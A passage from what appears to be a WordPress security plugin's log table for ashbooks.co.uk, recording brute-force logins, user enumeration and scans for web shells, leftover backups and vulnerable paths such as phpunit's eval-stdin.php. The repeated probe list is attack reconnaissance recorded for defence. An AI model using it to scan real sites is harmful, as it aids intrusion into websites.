499335,'admin',0,1636986150.9061,7,'y6M2TInuGi8mchRasqPjgbtE','','0|0|0|0|ashbooks.co.uk/wp-login.php'),('176.31.0.242',2954821874,'admin',0,1636986862.5705,7,'p8HBh3skPmgV1J46owLMSqiU','','0|0|0|0|ashbooks.co.uk/wp-login.php'),('136.144.210.23',2291192343,'admin',0,1636987541.9792,7,'89trzK7pwDvg0OFV4iCqaZ1u','','0|0|0|0|ashbooks.co.uk/wp-login.php'),('82.202.172.247',1389014263,'admin',0,1636988233.5072,7,'bdv08f9EQqHNs2il7OrPFgLZ','','0|0|0|0|ashbooks.co.uk/wp-login.php'),('192.187.118.205',3233511117,'admin',0,1636990930.7449,7,'7pXqosrHGWMPi95uvtNxOFTC','','0|0|0|0|www.ashbooks.co.uk/wp-login.php'),('45.158.15.145',765333393,'',0,1636991975.4178,55,'aeI7QGPyAXDb59xtYHiJ1N2C','','19|0|0|0|ashbooks.co.uk/wp-indo.php'),('107.150.48.236',1805005036,'ashbooks',0,1636999128.8393,51,'RsUQvwpe4G7jOrxogfISbkZ8','','0|0|0|0|ashbooks.co.uk/wp-login.php'),('107.150.57.34',1805007138,'admin',0,1637005612.5833,7,'2canojbsxKzEghB4yP3qeMvZ','','0|0|0|0|www.ashbooks.co.uk/wp-login.php'),('104.168.174.187',1755885243,'',0,1637007358.8077,70,'BsFlR07ZtVIjoh8w6HE3Lg2k','','0|0|0|0|ashbooks.co.uk//wp-json/wp/v2/users/'),('104.168.174.187',1755885243,'',0,1637007423.9599,70,'3YyGaCQpNT8zStP5cZJg2BjU','','0|0|0|0|ashbooks.co.uk//wp-json/wp/v2/users/'),('69.30.217.108',1159649644,'ashbooks',0,1637007552.4419,51,'o7g52GXfedJ1tblKFD3xHApZ','','0|0|0|0|ashbooks.co.uk/wp-login.php'),('162.55.178.210',2721559250,'',0,1637011160.5769,70,'KbepBFRVTWN5iUcjPmhADrJf','','0|0|0|0|ashbooks.co.uk//wp-json/wp/v2/users/'),('192.187.127.21',3233513237,'admin',0,1637014603.4749,7,'KyRYzEpVolsnQS01P5Xr9Aju','','0|0|0|0|www.ashbooks.co.uk/wp-login.php'),('173.208.152.237',2916129005,'ashbooks',0,1637016290.6635,51,'phJY7Kri4ay3t9mTD6FMG5gB','','0|0|0|0|ashbooks.co.uk/wp-login.php'),('137.184.117.45',2310567213,'',0,1637016978.7172,70,'lX2J5PIoMCZnO4KQ9u7UhYqd','','0|0|0|0|ashbooks.co.uk//wp-json/wp/v2/users/'),('130.149.80.199',2190823623,'admin',0,1637018407.8565,7,'bx6WI1vQJm9E0F7Pqo3MpgXh','','0|0|0|0|ashbooks.co.uk/wp-login.php'),('139.162.179.198',2342695878,'',0,1637020401.5284,55,'WqYUQ6jb0a3XDgnAwE28KP4r','','19|0|0|0|ashbooks.co.uk/wp-stream.php'),('13.70.143.132',222728068,'',0,1637021354.2480,70,'kHnVFvu7iYZ2SAQ1c0tOTbIN','','0|0|0|0|ashbooks.co.uk//wp-json/wp/v2/users/'),('13.70.143.132',222728068,'',0,1637024049.0353,70,'cLMqu6kD5HFA3f2bP7OdNx8o','','0|0|0|0|ashbooks.co.uk//wp-json/wp/v2/users/'),('107.150.57.34',1805007138,'ashbooks',0,1637028096.6551,51,'rR9vw1bIkAoPt7zBc6ElgFes','','0|0|0|0|ashbooks.co.uk/wp-login.php'),('107.150.57.34',1805007138,'ashbooks',0,1637030997.3709,51,'0zoeIZ7yFKVNuHShpG4mJaOW','','0|0|0|0|ashbooks.co.uk/wp-login.php'),('69.30.231.158',1159653278,'admin',0,1637032275.3885,7,'gjsdS9nrwfVxWetbl1ho5Ymv','','0|0|0|0|www.ashbooks.co.uk/wp-login.php'),('69.30.231.158',1159653278,'admin',0,1637040382.8579,7,'xnoDAYMdCGX7ml9NyZbVu1j4','','0|0|0|0|www.ashbooks.co.uk/wp-login.php'),('204.12.198.246',3423389430,'admin',0,1637040454.4984,7,'J684m21VFAjSTt9WZKDYqhRw','','0|0|0|0|www.ashbooks.co.uk/wp-login.php'),('69.30.217.108',1159649644,'ashbooks',0,1637041440.9792,51,'72JfapXZysMg0mrNYvCQ6I51','','0|0|0|0|ashbooks.co.uk/wp-login.php'),('192.187.127.21',3233513237,'ashbooks',0,1637041870.5603,51,'Vsrje2SfMC9KhvYZG7ciouBW','','0|0|0|0|ashbooks.co.uk/wp-login.php'),('69.30.231.158',1159653278,'admin',0,1637047453.0527,7,'lTSJ6nGsoDcumqvdN3MfUCh5','','0|0|0|0|www.ashbooks.co.uk/wp-login.php'),('69.30.240.27',1159655451,'admin',0,1637048554.9184,7,'AEbZG92I6n1rjhYQlNKfO480','','0|0|0|0|www.ashbooks.co.uk/wp-login.php'),('204.12.198.246',3423389430,'ashbooks',0,1637049138.7852,51,'PZUcEMpiTjDeW8HAV1oJz94Y','','0|0|0|0|ashbooks.co.uk/wp-login.php'),('192.187.118.205',3233511117,'admin',0,1637052365.6245,7,'B2yEMfYVS0spOrJoqviLe9bF','','0|0|0|0|www.ashbooks.co.uk/wp-login.php'),('69.30.231.158',1159653278,'ashbooks',0,1637052754.1177,51,'3FHgtTo9U2wEbKJXYafRIs7i','','0|0|0|0|ashbooks.co.uk/wp-login.php'),('20.114.47.166',343027622,'',0,1637055026.8734,55,'PfX6LipHoEbwWZ7389CMG2Ng','','19|0|0|0|ashbooks.co.uk/cloudxv3.php'),('20.114.47.166',343027622,'',0,1637055028.1610,55,'NWejRJEkYp1lfF0rLgxmawvZ','','19|0|0|0|ashbooks.co.uk/hello.php'),('69.30.240.27',1159655451,'ashbooks',0,1637058487.9173,51,'2rt3DiAhogbqGOpM1v9zRkBV','','0|0|0|0|ashbooks.co.uk/wp-login.php'),('217.160.192.178',3651190962,'',0,1637058521.7656,55,'F8iySNlOY3wZmxPpdBv0cEVo','','19|0|0|0|ashbooks.co.uk/style.php'),('217.160.192.178',3651190962,'',0,1637058527.2031,55,'XOnd5q2uxDIkSPQ3Ag7seGK1','','19|0|0|0|ashbooks.co.uk/moduless.php'),('217.160.192.178',3651190962,'',0,1637058532.5237,55,'QOTMf0JCtjYgx78L9vIcnEuG','','19|0|0|0|ashbooks.co.uk/wp-content/plugins/t_file_wp/t_file_wp.php'),('217.160.192.178',3651190962,'',0,1637058537.7375,55,'UDBzqSbEjP4sa7dTlIvmiXk0','','19|0|0|0|ashbooks.co.uk/admin.php'),('217.160.192.178',3651190962,'',0,1637058556.5180,55,'4KWoS0grPGB1MEwcL7XUbyOQ','','19|0|0|0|ashbooks.co.uk/boom.php'),('217.160.192.178',3651190962,'',0,1637058556.5711,10,'4KWoS0grPGB1MEwcL7XUbyOQ','','707|0|0|0|ashbooks.co.uk/boom.php'),('217.160.192.178',3651190962,'',0,1637058561.6011,55,'l7Dp38tLZsdNhEY1PWXTrm9k','','19|0|0|0|ashbooks.co.uk/wp-content/plugins/backup_index.php'),('217.160.192.178',3651190962,'',0,1637058566.3653,55,'3SoTVY1hZgUyt7XfAN9xwJkQ','','19|0|0|0|ashbooks.co.uk/wp-content/db_cache.php'),('217.160.192.178',3651190962,'',0,1637058572.1058,100,'yjPrQo9KSDq3BkhUMc6iu7bw','','13|0|0|0|ashbooks.co.uk/wp-content/plugins/ioptimization/IOptimize.php'),('217.160.192.178',3651190962,'',0,1637058582.5602,100,'F0WEudp3n8bRCQxYjMtrSqlk','','13|0|0|0|ashbooks.co.uk/wpindex.php'),('217.160.192.178',3651190962,'',0,1637058588.0425,100,'rnYauLv1O0BQJFbxH5Dw96fq','','13|0|0|0|ashbooks.co.uk/larva.php'),('217.160.192.178',3651190962,'',0,1637058594.2119,100,'KAZkmWQtoIsXqa26pP589xy3','','13|0|0|0|ashbooks.co.uk/th3_err0r.php'),('217.160.192.178',3651190962,'',0,1637058599.6603,55,'Lz6ENqol58pvwUOHbWr2neRa','','19|0|0|0|ashbooks.co.uk/alfindex.php'),('217.160.192.178',3651190962,'',0,1637058604.3860,55,'elzqXEicQ8sn9DhfvO32ZkPx','','19|0|0|0|ashbooks.co.uk/alfa.php'),('217.160.192.178',3651190962,'',0,1637058609.5790,55,'yEzaAING3p0s5w4Qc6fiVSmZ','','19|0|0|0|ashbooks.co.uk/wp-booking.php'),('217.160.192.178',3651190962,'',0,1637058614.8908,55,'fp9khKVDUyCSx5Bs7MclLe8j','','19|0|0|0|ashbooks.co.uk/cindex.php'),('217.160.192.178',3651190962,'',0,1637058620.5656,55,'Pm9rguzp0q3LInlchKb7FewX','','19|0|0|0|ashbooks.co.uk/wp-content/wp-1ogin_bak.php'),('217.160.192.178',3651190962,'',0,1637058626.8516,55,'4h7V8nATEK1jQgulXO0mFP5Z','','19|0|0|0|ashbooks.co.uk/wp-1ogin_bak.php'),('217.160.192.178',3651190962,'',0,1637058633.6304,55,'3SO95jGwAnWabzTcIPhkslg6','','19|0|0|0|ashbooks.co.uk/wp-includes/fonts/css.php'),('217.160.192.178',3651190962,'',0,1637058639.9543,55,'O8QL1IJuk2AR9pw56NjVHgDi','','19|0|0|0|ashbooks.co.uk/wp-includes/css/css.php'),('217.160.192.178',3651190962,'',0,1637058646.0105,55,'vrQR2V9U3Tch8KYeift6GLXs','','19|0|0|0|ashbooks.co.uk/old-index.php'),('217.160.192.178',3651190962,'',0,1637058651.5652,55,'ZJY4tDL71eMcxyhCzQ8UBNXa','','19|0|0|0|ashbooks.co.uk/config.bak.php'),('217.160.192.178',3651190962,'',0,1637058656.4726,55,'9JoYA2xaWrZC1uPkL3Fv0GOi','','19|0|0|0|ashbooks.co.uk/wp-admin/config.bak.php'),('217.160.192.178',3651190962,'',0,1637058661.0937,55,'apcus7hjM4C9D6e2EzWQiVt0','','19|0|0|0|ashbooks.co.uk/wp-content/config.bak.php'),('217.160.192.178',3651190962,'',0,1637058666.1338,55,'ks5giqjpTBM41xZH3vuKV9t7','','19|0|0|0|ashbooks.co.uk/wp-includes/config.bak.php'),('217.160.192.178',3651190962,'',0,1637058670.9123,55,'7QO3a2GwulotW9hsFifJ4YZm','','19|0|0|0|ashbooks.co.uk/wp-content/themes/config.bak.php'),('217.160.192.178',3651190962,'',0,1637058675.0613,55,'GDToxruaXmy14NIR3BOEnvL8','','19|0|0|0|ashbooks.co.uk/wp-content/plugins/config.bak.php'),('217.160.192.178',3651190962,'',0,1637058678.1460,18,'16NmCOwaS2JcyMZbo9XT4AtU','','13|0|0|0|ashbooks.co.uk/wp-includes/css/wp-config.php'),('217.160.192.178',3651190962,'',0,1637058682.7696,55,'DxzVyojSr5cKXbnWgQ6PGwNs','','19|0|0|0|ashbooks.co.uk/wp-content/plugins/ubh/up.php'),('217.160.192.178',3651190962,'',0,1637058688.9801,100,'C9El30ZPGYTixmhDcRQHF1SM','','13|0|0|0|ashbooks.co.uk/wp-includes/wpconfig.bak.php'),('217.160.192.178',3651190962,'',0,1637058693.4739,100,'cVDq230szIUnNuatK7FyWBCY','','13|0|0|0|ashbooks.co.uk/wp-content/plugins/wpconfig.bak.php'),('217.160.192.178',3651190962,'',0,1637058698.7740,55,'SdaIWFgsnu2PD3GkHUtrCL1A','','19|0|0|0|ashbooks.co.uk/haders.php'),('217.160.192.178',3651190962,'',0,1637058704.3283,100,'1j3yHFt2pmEgXJubrGfzKsNL','','13|0|0|0|ashbooks.co.uk/wp-content/wp-old-index.php'),('217.160.192.178',3651190962,'',0,1637058709.0794,55,'RZEaQl1MyvJtCnDm8U0Tbp9I','','19|0|0|0|ashbooks.co.uk/legion.php'),('217.160.192.178',3651190962,'',0,1637058714.6825,55,'gN2px3PaWlUv0QY6df9MhVRT','','19|0|0|0|ashbooks.co.uk/wp-content/mu-plugins/db-safe-mode.php'),('217.160.192.178',3651190962,'',0,1637058719.7184,55,'WoOmZ4redV5TwHDtcXGph7FJ','','19|0|0|0|ashbooks.co.uk/wp-includes/lfx.php'),('217.160.192.178',3651190962,'',0,1637058725.8137,55,'2ft1emPGSyD5w06QFWolrLvE','','19|0|0|0|ashbooks.co.uk/wp-includes/small.php'),('217.160.192.178',3651190962,'',0,1637058730.5758,55,'kHzsNby6JSvPen84rZclGauA','','19|0|0|0|ashbooks.co.uk/up.php'),('217.160.192.178',3651190962,'',0,1637058734.7912,55,'UgVC6XGnl47YzbqPQ3Rvjsim','','19|0|0|0|ashbooks.co.uk/upload.php'),('217.160.192.178',3651190962,'',0,1637058741.7774,55,'Uac7HIRr6iLuewGhK3C0AYMS','','19|0|0|0|ashbooks.co.uk/config.php'),('217.160.192.178',3651190962,'',0,1637058746.5385,100,'WmfeVguYJL1jSUk2hAIFTCdx','','13|0|0|0|ashbooks.co.uk/test.php'),('217.160.192.178',3651190962,'',0,1637058751.5772,55,'5x0Ap8cMeW2QXHnlNdvfG9Kh','','19|0|0|0|ashbooks.co.uk/wp-content/langar.php'),('217.160.192.178',3651190962,'',0,1637058757.7199,55,'OyiSHv7VEwkAUu6xZQmhjrbM','','19|0|0|0|ashbooks.co.uk/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php'),('217.160.192.178',3651190962,'',0,1637058763.6278,55,'o7tfGAgLQ8WFCvY063UIV5wS','','19|0|0|0|ashbooks.co.uk/wp-content/plugins/fancy-product-designer/inc/custom-image-handler.php'),('204.12.198.246',3423389430,'admin',0,1637063461.1253,7,'UWDLdv2GebxpEioqkKcJ6Iy9','','0|0|0|0|www.ashbooks.co.uk/wp-login.php'),('49.12.225.174',822927790,'',0,1637063559.1440,55,'Awo4rgKHmd3nvCjyYcLRhDbN','','19|0|0|0|ashbooks.co.uk/wordpress/wp-admin/setup-config.php'),('69.30.231.158',1159653278,'ashbooks',0,1637064141.5272,51,'8oBhZTiKWLSyEsgDkmdO9nvQ','','0|0|0|0|ashbooks.co.uk/wp-login.php'),('3.133.103.128',59074432,'',0,1637064777.8644,70,'v2DjJkUdFwe0iyaAtNPRxb3m','','0|0|0|0|ashbooks.co.uk/wp-json/wp/v2/users'),('204.12.198.246',3423389430,'admin',0,1637069282.7452,7,'mzYc1SAr3L0Els5wi8yVOCx2','','0|0|0|0|www.ashbooks.co.uk/wp-login.php'),('192.187.118.205',3233511117,'ashbooks',0,1637070070.5868,51,'3Wg9SJOy2hmvfcEk1PlDUdow','','0|0|0|0|ashbooks.co.uk/wp-login.php'),('91.185.199.254',1538902014,'',0,1637072300.6531,55,'v27egZaxwCA0DtqPkFY5SrzR','','19|0|0|0|ashbooks.co.uk/wp-content/plugins/wp-striplple/striplple.php'),('91.185.199.254',1538902014,'',0,1637072417.8310,55,'Irjiw6uYDb1GU5Op87qWTdAS','','19|0|0|0|ashbooks.co.uk/wp-stream.php'),('23.23.6.16',387384848,'',0,1637073027.4438,70,'SsAX2rJovUTmOLYRPfB0uGq6','','0|0|0|0|ashbooks.co.uk//wp-json/wp/v2/users/'),('69.30.231.158',1159653278,'admin',0,1637074863.7190,7,'uP1OwmEoIDqRxj2e5VKH4TaX','','0|0|0|0|www.ashbooks.co.uk/wp-login.php'),('192.187.127.21',3233513237,'ashbooks',0,1637075957.6355,51,'YNmjpky0ahsuK5MDOoCIPneG','','0|0|0|0|ashbooks.co.uk/wp-login.php'),('23.23.6.16',387384848,'',0,1637076079.7477,70,'a0D9eYx4Fh7JoMS1diLG5Bzk','','0|0|0|0|ashbooks.co.uk//wp-json/wp/v2/users/'),('104.154.111.139',1754951563,'',0,1637076211.9446,70,'DBztPd8WFQ2mu5Jj6MR4CIvT','','0|0|0|0|ashbooks.co.uk/wp-json/wp/v2/users/'),('104.154.111.139',1754951563,'',0,1637076211.9700,70,'1Sp6UbJoOmzt58jHwqWF4CDV','','0|0|0|0|ashbooks.co.uk/wp-json/wp/v2/users/'),('69.30.231.158',1159653278,'admin',0,1637080976.1608,7,'Pu5aG0OFZ8B7vmL2y3cMHpkE','','0|0|0|0|www.ashbooks.co.uk/wp-login.php'),('192.187.118.205',3233511117,'ashbooks',0,1637082064.9833,51,'h9aDiIojKBUAZwM6Fgsc8O1X','','0|0|0|0|ashbooks.co.uk/wp-login.php'),('192.187.118.205',3233511117,'ashbooks',0,1637088171.7750,51,'PCLIt9WxklbGKEJA3USoa1Qy','','0|0|0|0|ashbooks.co.uk/wp-login.php'),('23.23.6.16',387384848,'',0,1637089957.1056,70,'x3MG09mBN6R2fZAprUOsHYW8','','0|0|0|0|ashbooks.co.uk//wp-json/wp/v2/users/'),('37.233.17.225',636031457,'',0,1637092823.9886,55,'QbsT9HnqFSXGtyL7pgRhKuJB','','19|0|0|0|www.ashbooks.co.uk/weblog/index.php'),('40.69.131.238',675644398,'',0,1637092824.5831,55,'uFWdmpwJU4X1ocL7Kl092Zhy','','19|0|0|0|ashbooks.co.uk/style.php'),('40.69.131.238',675644398,'',0,1637092827.0414,55,'sC7qLk8IGW69HVnxaAc4jFK0','','19|0|0|0|ashbooks.co.uk/moduless.php'),('40.69.131.238',675644398,'',0,1637092829.6075,55,'X5dUleYx1tfjnMzcCDJBP3Wu','','19|0|0|0|ashbooks.co.uk/wp-content/plugins/t_file_wp/t_file_wp.php'),('40.69.131.238',675644398,'',0,1637092832.1288,55,'ES9tMIP6HkozKgBhZ5y7QWjJ','','19|0|0|0|ashbooks.co.uk/admin.php'),('40.69.131.238',675644398,'',0,1637092847.3017,55,'s0MevD2KRrSOgCxLVoXGn5kj','','19|0|0|0|ashbooks.co.uk/boom.php'),('40.69.131.238',675644398,'',0,1637092847.3595,10,'s0MevD2KRrSOgCxLVoXGn5kj','','707|0|0|0|ashbooks.co.uk/boom.php'),('40.69.131.238',675644398,'',0,1637092849.8495,55,'AtvwCb2QZENjBug45MnTWo9H','','19|0|0|0|ashbooks.co.uk/wp-content/plugins/backup_index.php'),('40.69.131.238',675644398,'',0,1637092852.3637,55,'kvnf2IcEXFtbPQlq4uNyBgAp','','19|0|0|0|ashbooks.co.uk/wp-content/db_cache.php'),('40.69.131.238',675644398,'',0,1637092855.3838,100,'zUQ9Y3JOcVgy7SAvhoxsl08W','','13|0|0|0|ashbooks.co.uk/wp-content/plugins/ioptimization/IOptimize.php'),('40.69.131.238',675644398,'',0,1637092860.9436,100,'MPdLiz1SfpuqAo5OF6k803Qc','','13|0|0|0|ashbooks.co.uk/wpindex.php'),('40.69.131.238',675644398,'',0,1637092863.6464,100,'hcBmYglZwd897H52FteCGUIi','','13|0|0|0|ashbooks.co.uk/larva.php'),('40.69.131.238',675644398,'',0,1637092866.4184,100,'fFT9h4P1aVYWlLme2wj0KcMO','','13|0|0|0|ashbooks.co.uk/th3_err0r.php'),('40.69.131.238',675644398,'',0,1637092869.2452,55,'srH1XuIqCwM2im8jEVlpYtQy','','19|0|0|0|ashbooks.co.uk/alfindex.php'),('40.69.131.238',675644398,'',0,1637092871.7710,55,'n4DN1aMCb5VZ8BdwUKHrlEWe','','19|0|0|0|ashbooks.co.uk/alfa.php'),('40.69.131.238',675644398,'',0,1637092874.5148,55,'8s1NMSJETnc6a3tYLHpvmIQw','','19|0|0|0|ashbooks.co.uk/wp-booking.php'),('40.69.131.238',675644398,'',0,1637092884.2246,55,'WQSjwn4CE6AFUgOoRDXx8trf','','19|0|0|0|ashbooks.co.uk/cindex.php'),('40.69.131.238',675644398,'',0,1637092887.4584,55,'sDl9wZOdSzo4KMc7IXmW1P53','','19|0|0|0|ashbooks.co.uk/wp-content/wp-1ogin_bak.php'),('40.69.131.238',675644398,'',0,1637092889.8743,55,'FdUmrVTED8GOyfZpu1icPbaK','','19|0|0|0|ashbooks.co.uk/wp-1ogin_bak.php'),('40.69.131.238',675644398,'',0,1637092892.3401,55,'BbscrlXoUKw34ExfpzjYSeAL','','19|0|0|0|ashbooks.co.uk/wp-includes/fonts/css.php'),('40.69.131.238',675644398,'',0,1637092895.1019,55,'8JjSr6dCv0tu49KPFApLezs5','','19|0|0|0|ashbooks.co.uk/wp-includes/css/css.php'),('40.69.131.238',675644398,'',0,1637092908.5908,55,'pfmA25OPUvZiRnXNQF6cWYxj','','19|0|0|0|ashbooks.co.uk/old-index.php'),('40.69.131.238',675644398,'',0,1637092911.2136,55,'UiP6AneXsa1BlCfZYtN5zWSR','','19|0|0|0|ashbooks.co.uk/config.bak.php'),('40.69.131.238',675644398,'',0,1637092913.3955,55,'m6ExPjuBH5UFJlw2RrKhaY8X','','19|0|0|0|ashbooks.co.uk/wp-admin/config.bak.php'),('40.69.131.238',675644398,'',0,1637092915.9325,55,'jqVBAZGrMz4OHFCdK9N7o5wT','','19|0|0|0|ashbooks.co.uk/wp-content/config.bak.php'),('40.69.131.238',675644398,'',0,1637092919.2523,55,'O2EoXFJtLur5PTaq9SwU3vCV','','19|0|0|0|ashbooks.co.uk/wp-includes/config.bak.php'),('40.69.131.238',675644398,'',0,1637092922.0170,55,'L2oZKPiHu3eBDg15jUM9EzWh','','19|0|0|0|ashbooks.co.uk/wp-content/themes/config.bak.php'),('40.69.131.238',675644398,'',0,1637092924.5596,55,'QGRHhM7umJxF1Sv5AwiPYKzy','','19|0|0|0|ashbooks.co.uk/wp-content/plugins/config.bak.php'),('40.69.131.238',675644398,'',0,1637092926.3608,18,'XS4O7qtQx823UrKfuFbeHizI','','13|0|0|0|ashbooks.co.uk/wp-includes/css/wp-config.php'),('40.69.131.238',675644398,'',0,1637092928.6650,55,'Ba39OjLfYHs7EDxAyP0I1rNo','','19|0|0|0|ashbooks.co.uk/wp-content/plugins/ubh/up.php'),('40.69.131.238',675644398,'',0,1637092931.3235,100,'8BGfCT7dQhuOcFEeyI5WzwA1','','13|0|0|0|ashbooks.co.uk/wp-includes/wpconfig.bak.php'),('40.69.131.238',675644398,'',0,1637092933.4319,100,'7dweXFNa9W6YyICj8QnoTBib','','13|0|0|0|ashbooks.co.uk/wp-content/plugins/wpconfig.bak.php'),('40.69.131.238',675644398,'',0,1637092939.8168,55,'F8e6JwmDcsUiRdqtzhkHbLYB','','19|0|0|0|ashbooks.co.uk/haders.php'),('40.69.131.238',675644398,'',0,1637092942.7192,100,'GiTz1uymBesLkhdlPOJ7XCWF','','13|0|0|0|ashbooks.co.uk/wp-content/wp-old-index.php'),('40.69.131.238',675644398,'',0,1637092953.7921,55,'XYBLT436Qzh2irOqbCS9xfUE','','19|0|0|0|ashbooks.co.uk/legion.php'),('40.69.131.238',675644398,'',0,1637092957.1023,55,'DZXu5khoJrpOjyHc6GsPnzSl','','19|0|0|0|ashbooks.co.uk/wp-content/mu-plugins/db-safe-mode.php'),('40.69.131.238',675644398,'',0,1637092960.5304,55,'c9Fxh1WLaK3kv0wlRz6gAOCP','','19|0|0|0|ashbooks.co.uk/wp-includes/lfx.php'),('40.69.131.238',675644398,'',0,1637092963.2902,55,'GshT8kvRaoSNFqYKwl4Ep2C1','','19|0|0|0|ashbooks.co.uk/wp-includes/small.php'),('40.69.131.238',675644398,'',0,1637092965.4820,55,'UkSvDm87j69YqbQ0ipOGKfRz','','19|0|0|0|ashbooks.co.uk/up.php'),('40.69.131.238',675644398,'',0,1637092967.6892,55,'SZEYx7gD9h4zRLKIkcHOm23f','','19|0|0|0|ashbooks.co.uk/upload.php'),('40.69.131.238',675644398,'',0,1637092970.2133,55,'YaxkwD0b5t6PKNLGCFpBOgni','','19|0|0|0|ashbooks.co.uk/config.php'),('40.69.131.238',675644398,'',0,1637092972.9274,100,'6EPVIH7dOkgZA08WrSlM9B4z','','13|0|0|0|ashbooks.co.uk/test.php'),('40.69.131.238',675644398,'',0,1637092989.6408,55,'WSkdMbcIUVtOYR5gomFv1wDx','','19|0|0|0|ashbooks.co.uk/wp-content/langar.php'),('40.69.131.238',675644398,'',0,1637092992.4292,55,'0RhodM6lN1AkibVSeIYzPpaQ','','19|0|0|0|ashbooks.co.uk/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php'),('40.69.131.238',675644398,'',0,1637092994.7591,55,'0hZbuCTgy1NFEeqVl9n3Wx64','','19|0|0|0|ashbooks.co.uk/wp-content/plugins/fancy-product-designer/inc/custom-image-handler.php'),('198.1.119.72',3321984840,'',0,1637093165.4431,55,'OvBaq8XdLJpE1U9xF4ozhuZS','','19|0|0|0|ashbooks.co.uk/wp-content/plugins/wp-striplple/striplple.php'),('198.1.119.72',3321984840,'',0,1637093206.4213,55,'8Esj5q9HUm1zRO0DASZdPwKI','','19|0|0|0|ashbooks.co.uk/wp-stream.php'),('198.1.119.72',3321984840,'',0,1637093206.4221,55,'CP34hYauniVmQ5kIqrJjeRvK','','19|0|0|0|ashbooks.co.uk/wp-stream.php'),('198.1.119.72',3321984840,'',0,1637093442.4032,55,'SA40jLCgRmFyetkqOx6Q7VpT','','19|0|0|0|ashbooks.co.uk/wp-content/plugins/wp-striplple/striplple.php'),('69.30.217.108',1159649644,'ashbooks',0,1637093770.5748,51,'SZJeT3rpzQBwhE1lcmAHvXOb','','0|0|0|0|ashbooks.co.uk/wp-login.php'),('69.30.217.108',1159649644,'admin',0,1637098484.6112,7,'MBpzlda2o4U017Ly85hkrqOZ','','0|0|0|0|www.ashbooks.co.uk/wp-login.php'),('69.30.240.27',1159655451,'ashbooks',0,1637099259.6802,51,'xW1MblVSqnRTcezKj2rZ9NIy','','0|0|0|0|ashbooks.co.uk/wp-login.php'),('23.23.6.16',387384848,'',0,1637102450.6972,70,'aIPm86fb1GBY4DZuskynQrN5','','0|0|0|0|ashbooks.co.uk//wp-json/wp/v2/users/'),('192.187.118.205',3233511117,'admin',0,1637104263.6085,7,'QMpxhrAEC7ctkd0HlzWFXVgn','','0|0|0|0|www.ashbooks.co.uk/wp-login.php'),('69.30.231.158',1159653278,'ashbooks',0,1637104922.9131,51,'SXDvUiwAu6EcQWBhHRlbqYn8','','0|0|0|0|ashbooks.co.uk/wp-login.php'),('69.197.160.227',1170579683,'admin',0,1637109761.8713,7,'OVzb6v5HN9lreaShi8uWFdTM','','0|0|0|0|www.ashbooks.co.uk/wp-login.php'),('192.187.127.21',3233513237,'ashbooks',0,1637110352.1004,51,'XVLnjeIo06hYuQzwpiNgAEMP','','0|0|0|0|ashbooks.co.uk/wp-login.php'),('192.187.118.205',3233511117,'admin',0,1637115443.9579,7,'Ie0xg1thQZwVqGbHkS4yL9Ui','','0|0|0|0|www.ashbooks.co.uk/wp-login.php'),('192.187.127.21',3233513237,'ashbooks',0,1637116612.7542,51,'xAI2m6fYT0P9OERLcJtpNKB4','','0|0|0|0|ashbooks.co.uk/wp-login.php'),('40.69.131.238',675644398,'',0,1637119650.9310,55,'V9aIdchE2gPv6x7Ab3zTuFX1','','19|0|0|0|ashbooks.co.uk/style.php'),('40.69.131.238',675644398,'',0,1637119653.5283,55,'l6CI0ZF5afW3rQhny4OV7mBS','','19|0|0|0|ashbooks.co.uk/moduless.php'),('40.69.131.238',675644398,'',0,1637119655.6985,55,'4jNCoSIGAP90bWMi2EmZeJxf','','19|0|0|0|ashbooks.co.uk/wp-content/plugins/t_file_wp/t_file_wp.php'),('40.69.131.238',675644398,'',0,1637119657.8144,55,'kgYWoGxLyz7NtFSw6MV4P2ji','','19|0|0|0|ashbooks.co.uk/admin.php'),('40.69.131.238',675644398,'',0,1637119664.1519,55,'nbT3eL6Mc0azOtJfvWYKrgCw','','19|0|0|0|ashbooks.co.uk/boom.php'),('40.69.131.238',675644398,'',0,1637119664.1945,10,'nbT3eL6Mc0azOtJfvWYKrgCw','','707|0|0|0|ashbooks.co.uk/boom.php'),('40.69.131.238',675644398,'',0,1637119666.3250,55,'bn6amXhwJHyeE9lOxvNVWIqA','','19|0|0|0|ashbooks.co.uk/wp-content/plugins/backup_index.php'),('40.69.131.238',675644398,'',0,1637119668.8269,55,'6VqfD3b1IcCdZxweYaTJiUyN','','19|0|0|0|ashbooks.co.uk/wp-content/db_cache.php'),('40.69.131.238',675644398,'',0,1637119671.0496,100,'Z61G2KAMOLDmVgkbHC3zxh9t','','13|0|0|0|ashbooks.co.uk/wp-content/plugins/ioptimization/IOptimize.php'),('40.69.131.238',675644398,'',0,1637119675.9260,100,'MjwCPaTQXozmci4LUkg0qVpH','','13|0|0|0|ashbooks.co.uk/wpindex.php'),('40.69.131.238',675644398,'',0,1637119678.0388,100,'BVQbkodeSTNK1mXUHRn6sOPw','','13|0|0|0|ashbooks.co.uk/larva.php'),('40.69.131.238',675644398,'',0,1637119680.4351,100,'vxgj8dsIG2AnCEYZQp3Wmqy0','','13|0|0|0|ashbooks.co.uk/th3_err0r.php'),('40.69.131.238',675644398,'',0,1637119682.8982,55,'qvly3JmTE12RcZbQwB6nP0Mj','','19|0|0|0|ashbooks.co.uk/alfindex.php'),('40.69.131.238',675644398,'',0,1637119684.9990,55,'tbfo38wZC6qpO9sXFK5yW1HA','','19|0|0|0|ashbooks.co.uk/alfa.php'),('40.69.131.238',675644398,'',0,1637119687.2793,55,'cfv0yjOq8HVMFZCgbASLt7Wr','','19|0|0|0|ashbooks.co.uk/wp-booking.php'),('40.69.131.238',675644398,'',0,1637119689.0508,55,'Tjrbigh1fUHFGVu6eP7mXvq9','','19|0|0|0|ashbooks.co.uk/cindex.php'),('40.69.131.238',675644398,'',0,1637119690.8791,55,'K35ugvl0aSRWkoz7cxr9bONC','','19|0|0|0|ashbooks.co.uk/wp-content/wp-1ogin_bak.php'),('40.69.131.238',675644398,'',0,1637119692.7697,55,'b7PFk2YZgdzDCaRSfoLvcsGy','','19|0|0|0|ashbooks.co.uk/wp-1ogin_bak.php'),('40.69.131.238',675644398,'',0,1637119695.0358,55,'jrxgQlfIYCdTs5ZmzXMRon9H','','19|0|0|0|ashbooks.co.uk/wp-includes/fonts/css.php'),('40.69.131.238',675644398,'',0,1637119697.2833,55,'Omt0CW8PFipae5NhXDBcZj7d','','19|0|0|0|ashbooks.co.uk/wp-includes/css/css.php'),('40.69.131.238',675644398,'',0,1637119700.6199,55,'lrYXeD0B3CStgbyNZUpE5qR2','','19|0|0|0|ashbooks.co.uk/old-